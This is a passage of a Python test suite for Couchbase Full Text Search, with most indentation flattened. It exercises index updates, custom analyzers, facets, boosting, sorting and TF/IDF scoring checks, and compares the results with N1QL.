index.index_definition['uuid'] = index.get_uuid()
index.update()
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
def update_index_during_large_indexing(self):
"""
MB-22410 - Updating index with a large dirty write queue
        items = several million, set at run time via the 'items' parameter
"""
rest = RestConnection(self._cb_cluster.get_random_fts_node())
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items//2)
status, stat_value = rest.get_fts_stats(index_name=index.name,
bucket_name=bucket.name,
stat_name='num_recs_to_persist')
self.log.info("Data(metadata + docs) in write queue is {0}".
format(stat_value))
new_plan_param = self.construct_plan_params()
index.index_definition['planParams'] = \
index.build_custom_plan_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10, "Wait for index to get updated...")
self.is_index_partitioned_balanced(index=index)
_, defn = index.get_index_defn()
self.log.info(defn['indexDef'])
# see if the index is still query-able with all data
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query,
zero_results_ok=False)
self.log.info("Hits: %s" % hits)
def delete_index_during_large_indexing(self):
"""
MB-22410 - Deleting index with a large dirty write queue is slow
items = 5M
"""
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
# wait till half the keys are indexed
self.wait_for_indexing_complete(self._num_items//2)
index.delete()
self.sleep(5)
try:
_, defn = index.get_index_defn()
self.log.info(defn)
self.fail("ERROR: Index definition still exists after deletion! "
"%s" %defn['indexDef'])
except Exception as e:
self.log.info("Expected exception caught: %s" % e)
def edit_index_negative(self):
self.load_employee_dataset()
bucket = self._cb_cluster.get_bucket_by_name('default')
index = self.create_index(bucket, 'sample_index')
self.wait_for_indexing_complete()
hits, _, _, _ = index.execute_query(self.sample_query)
new_plan_param = {"maxPartitionsPerPIndex": 30}
self.partitions_per_pindex = 30
# update params with plan params values to check for validation
index.index_definition['params'] = \
index.build_custom_index_params(new_plan_param)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as e:
self.log.info("Expected exception: %s" % e)
def index_query_beer_sample(self):
#delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
self.load_sample_buckets(server=master, bucketName="beer-sample")
bucket = self._cb_cluster.get_bucket_by_name("beer-sample")
index = self.create_index(bucket, "beer-index")
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
query = {"match": "cafe", "field": "name"}
hits, _, _, _ = index.execute_query(query,
zero_results_ok=False,
expected_hits=10)
self.log.info("Hits: %s" % hits)
def index_query_custom_mapping(self):
"""
uses RQG for custom mapping
"""
# create a custom map, disable default map
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
if self.es:
self.create_es_index_mapping(index.es_custom_map,
index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
def test_query_string_combinations(self):
"""
uses RQG framework minus randomness for testing query-string combinations of '', '+', '-'
{
mterms := [
[], // none
["+Wikipedia"], // one term
["+Wikipedia", "+English"], // two terms
["+the"], // one term (stop word)
["+the", "+English"], // two terms (one stop)
["+the", "+and"], // two terms (both stop)
]
sterms = [
[], // none
["Category"], // one term
["Category", "United"], // two terms
["of"], // one term (stop word)
["of", "United"], // two terms (one stop)
["of", "at"], // two terms (both stop)
]
nterms = [
[], // none
["-language"], // one term
["-language", "-States"], // two terms
["-for"], // one term (stop word)
["-for", "-States"], // two terms (one stop)
["-for", "-with"], // two terms (both stop)
]
}
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.fts_queries = []
mterms = [[],
["+revision.text.#text:\"Wikipedia\""],
["+revision.text.#text:\"Wikipedia\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"English\""],
["+revision.text.#text:\"the\"", "+revision.text.#text:\"and\""]]
sterms = [[],
["revision.text.#text:\"Category\""],
["revision.text.#text:\"Category\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"United\""],
["revision.text.#text:\"of\"", "revision.text.#text:\"at\""]]
nterms = [[],
["-revision.text.#text:\"language\""],
["-revision.text.#text:\"language\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"States\""],
["-revision.text.#text:\"for\"", "-revision.text.#text:\"with\""]]
for mterm in mterms:
for sterm in sterms:
for nterm in nterms:
clause = (' '.join(mterm) + ' ' + ' '.join(sterm) + ' ' + ' '.join(nterm)).strip()
query = {"query": clause}
index.fts_queries.append(json.loads(json.dumps(query, ensure_ascii=False)))
if self.compare_es:
self.es.es_queries.append(json.loads(json.dumps({"query": {"query_string": query}},
ensure_ascii=False)))
self.run_query_and_compare(index)
def index_edit_and_query_custom_mapping(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
error_msg = str(err)
self.log.error(err)
fail = True
self.log.info("Editing custom index with new map...")
index.generate_new_custom_map(seed=index.cm_id+10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map)
self.load_data()
self.wait_for_indexing_complete()
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
if fail:
            # error_msg is a plain string; fail the test with it rather than raising it
            self.fail(error_msg)
def index_query_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.load_data()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def load_index_query_all_in_parallel(self):
"""
Run rqg before querying is complete
turn off es validation
goal is to make sure there are no fdb or cbft crashes
"""
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="default_index")
self.sleep(20)
self.generate_random_queries(index, self.num_queries, self.query_types)
from threading import Thread
threads = []
threads.append(Thread(target=self.load_data,
name="loader thread",
args=()))
threads.append(Thread(target=self.run_query_and_compare,
name="query thread",
args=(index,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def index_edit_and_query_custom_analyzer(self):
"""
Index and query index, update map, query again, uses RQG
"""
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.load_data()
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
try:
self.run_query_and_compare(index)
except AssertionError as err:
            error_msg = str(err)
            self.log.error(err)
            fail = True
self.log.info("Editing custom index with new custom analyzer...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
index.update()
# updating mapping on ES is not easy, often leading to merge issues
# drop and recreate the index, load again
self.create_es_index_mapping(index.es_custom_map, index.index_definition)
self.wait_for_indexing_complete()
try:
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(index, n1ql_executor=n1ql_executor)
except AssertionError as err:
            error_msg = str(err)
            self.log.error(err)
            fail = True
        if fail:
            # 'err' goes out of scope once the except block exits (Python 3),
            # so fail with the captured message instead of re-raising it
            self.fail(error_msg)
def index_delete_custom_analyzer(self):
"""
Create Index and then update by deleting custom analyzer in use, or custom filter in use.
"""
error_msg = TestInputSingleton.input.param('error_msg', '')
fail = False
index = self.create_index(
bucket=self._cb_cluster.get_bucket_by_name('default'),
index_name="custom_index")
self.load_data()
self.wait_for_indexing_complete()
self.log.info("Editing custom index by deleting custom analyzer/filter in use...")
index.update_custom_analyzer(seed=index.cm_id + 10)
index.index_definition['uuid'] = index.get_uuid()
try:
index.update()
except Exception as err:
self.log.error(err)
            if error_msg in str(err):
self.log.info("Error is expected")
else:
self.log.info("Error is not expected")
raise err
def test_field_name_alias(self):
"""
Test the Searchable As property in field mapping
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias)
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, matches, time_taken, status = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
def test_one_field_multiple_analyzer(self):
"""
1. Create an default FTS index on wiki dataset
2. Update it to add a field mapping for revision.text.#text field with 'en' analyzer
3. Should get 0 search results for a query
4. Update it to add another field mapping for the same field, with 'fr' analyzer
5. Same query should yield more results now.
"""
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits1", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
index.add_analyzer_to_existing_field_map(field_name=self.field_name,
field_type=self.field_type,
field_alias=self.field_alias,
analyzer="fr")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits2", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
def test_facets(self):
field_indexed = self._input.param("field_indexed", True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
index.validate_facets_in_search_results(no_of_hits=hits,
facets_returned=facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ str(err))
def test_facets_during_index(self):
field_indexed = self._input.param("field_indexed", True)
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.sleep(5)
index.add_child_field_to_default_mapping(field_name="type",
field_type="text",
field_alias="type",
analyzer="keyword")
if field_indexed:
index.add_child_field_to_default_mapping(field_name="dept",
field_type="text",
field_alias="dept",
analyzer="keyword")
index.add_child_field_to_default_mapping(field_name="salary",
field_type="number",
field_alias="salary")
index.add_child_field_to_default_mapping(field_name="join_date",
field_type="datetime",
field_alias="join_date")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
while not self.is_index_complete(index.name):
zero_results_ok = True
try:
hits, _, _, _, facets = index.execute_query_with_facets(query,
zero_results_ok=zero_results_ok)
self.log.info("Hits: %s" % hits)
self.log.info("Facets: %s" % facets)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: "+ str(err))
def test_doc_config(self):
# delete default bucket
self._cb_cluster.delete_bucket("default")
master = self._cb_cluster.get_master_node()
# Load Travel Sample bucket and create an index
self.load_sample_buckets(server=master, bucketName="travel-sample")
bucket = self._cb_cluster.get_bucket_by_name("travel-sample")
index = self.create_index(bucket, "travel-index")
self.sleep(10)
self.wait_for_indexing_complete()
# Add Type Mapping
index.add_type_mapping_to_index_definition(type="airport",
analyzer="en")
index.add_type_mapping_to_index_definition(type="hotel",
analyzer="en")
mode = self._input.param("mode", "type_field")
index.add_doc_config_to_index_definition(mode=mode)
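        # 'mode' selects how FTS maps documents to type mappings
        # (e.g. type_field, docid_prefix or docid_regexp)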
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True,
zero_rows_ok=False)
# Run Query
expected_hits = int(self._input.param("expected_hits", 0))
if not expected_hits:
zero_results_ok = True
else:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
try:
for index in self._cb_cluster.get_indexes():
hits, _, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
consistency_level=self.consistency_level,
consistency_vectors=self.consistency_vectors)
self.log.info("Hits: %s" % hits)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_boost_query_type(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
zero_results_ok = False
expected_hits = 5
        # Run the query without boosting and compare the scores for docs
        # emp10000045 & emp10000053. They should be equal.
query = {"query": "dept:Marketing name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_before_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000045')
score_before_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000053')
self.log.info("Scores before boosting:")
self.log.info("")
self.log.info("emp10000045: %s", score_before_boosting_doc1)
self.log.info("emp10000053: %s", score_before_boosting_doc2)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
        if score_before_boosting_doc1 != score_before_boosting_doc2:
self.fail("Testcase failed: Scores for emp10000045 & emp10000053 "
"are not equal before boosting")
        # Re-run the query with the dept clause boosted (^5) and compare the
        # scores for docs emp10000045 & emp10000053 against the unboosted run
query = {"query": "dept:Marketing^5 name:Safiya"}
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
score_after_boosting_doc1 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000045')
score_after_boosting_doc2 = index.get_score_from_query_result_content(
contents=contents, doc_id='emp10000053')
self.log.info("Scores after boosting:")
self.log.info("")
self.log.info("emp10000045: %s", score_after_boosting_doc1)
self.log.info("emp10000053: %s", score_after_boosting_doc2)
assert score_after_boosting_doc1 == score_after_boosting_doc2
assert score_before_boosting_doc1 < score_after_boosting_doc1
assert score_before_boosting_doc2 < score_after_boosting_doc2
def test_doc_id_query_type(self):
# Create bucket, create index
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_type_mapping_to_index_definition(type="emp",
analyzer="keyword")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(15)
self.wait_for_indexing_complete()
expected_hits = int(self._input.param("expected_hits", 0))
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
# From the Query string, fetch the Doc IDs
doc_ids = copy.deepcopy(query['ids'])
# If invalid_doc_id param is passed, add this to the query['ids']
invalid_doc_id = self._input.param("invalid_doc_id", 0)
if invalid_doc_id:
query['ids'].append(invalid_doc_id)
# If disjuncts_query is passed, join query and disjuncts_query
# to form a new query string
disjuncts_query = self._input.param("disjuncts_query", None)
if disjuncts_query:
if isinstance(disjuncts_query, str):
disjuncts_query = json.loads(disjuncts_query)
            query = {"disjuncts": [disjuncts_query, query]}
# Execute Query
zero_results_ok = False
try:
for index in self._cb_cluster.get_indexes():
n1ql_query = "select d, meta().id from default d where search(d, "+json.dumps(query)+") and type='emp'"
hits, contents, _, _ = index.execute_query(query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Contents: %s" % contents)
# For each doc id passed in the query, validate the
# presence in the search results
for doc_id in doc_ids:
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=doc_id), "Doc ID "
"%s is not present in Search results"
% doc_id)
if self.run_via_n1ql:
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertTrue(index.is_doc_present_in_query_result_content
(contents=n1ql_results['results'], doc_id=doc_id), "Doc ID "
"%s is not present in N1QL Search results"
% doc_id)
score = index.get_score_from_query_result_content\
(contents=contents, doc_id=doc_id)
self.log.info ("Score for Doc ID {0} is {1}".
format(doc_id, score))
if invalid_doc_id:
# Validate if invalid doc id was passed, it should
# not be present in the search results
self.assertFalse(index.is_doc_present_in_query_result_content
(contents=contents, doc_id=invalid_doc_id),
"Doc ID %s is present in Search results"
% invalid_doc_id)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results_during_indexing(self):
self.load_data()
self.wait_till_items_in_bucket_equal(self._num_items//2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
#self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
#expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
while not self.is_index_complete(index.name):
sort_params = self.build_sort_params()
hits, raw_hits, _, _ = index.execute_query(query = query,
zero_results_ok=zero_results_ok,
sort_fields=sort_params,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
#self.sleep(5)
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_sorting_of_results_on_non_indexed_fields(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping(field_name="name",
field_type="text",
field_alias="name",
analyzer="en")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=self.sort_fields_list,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + str(err))
def test_scoring_tf_score(self):
"""
Test if the TF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"cat - a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
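            # explain=True returns the scoring breakdown with each hit, which
            # get_detailed_scores_for_doc() parses for the per-term weights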
tf_score1, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 1 = %s" % tf_score1)
tf_score2, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 2 = %s" % tf_score2)
tf_score3, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 3 = %s" % tf_score3)
self.assertTrue(tf_score1 > tf_score2 > tf_score3,
"Testcase failed. TF score for Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def compare_n1ql_fts_scoring(self, n1ql_query='', raw_hits=[]):
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertEqual(len(n1ql_results['results']), len(raw_hits),
"Return values are not the same for n1ql query and fts request.")
for res in n1ql_results['results']:
for hit in raw_hits:
if res['id'] == hit['id']:
self.assertEqual(res['score'], hit['score'],
"Scoring is not the same for n1ql result and fts request hit")
def test_scoring_idf_score(self):
"""
Test if the IDF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog and a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy fox and a brown fox\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, idf1, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("IDF score for Doc ID 1 = %s" % idf1)
_, _, idf2, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='lazy')
self.log.info( "IDF score for Doc ID 2 = %s" % idf2)
            self.assertTrue(idf1 > idf2, "Testcase failed. IDF score for search "
                            "term 'cat' not > that of search term 'lazy'")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_field_norm_score(self):
"""
Test if the Field Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, field_norm1, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 1 = %s" % field_norm1)
_, field_norm2, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 2 = %s" % field_norm2)
_, field_norm3, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 3 = %s" % field_norm3)
self.assertTrue(field_norm1 > field_norm2 > field_norm3,
"Testcase failed. Field Normalization score for "
"Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_query_norm_score(self):
"""
Test if the Query Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
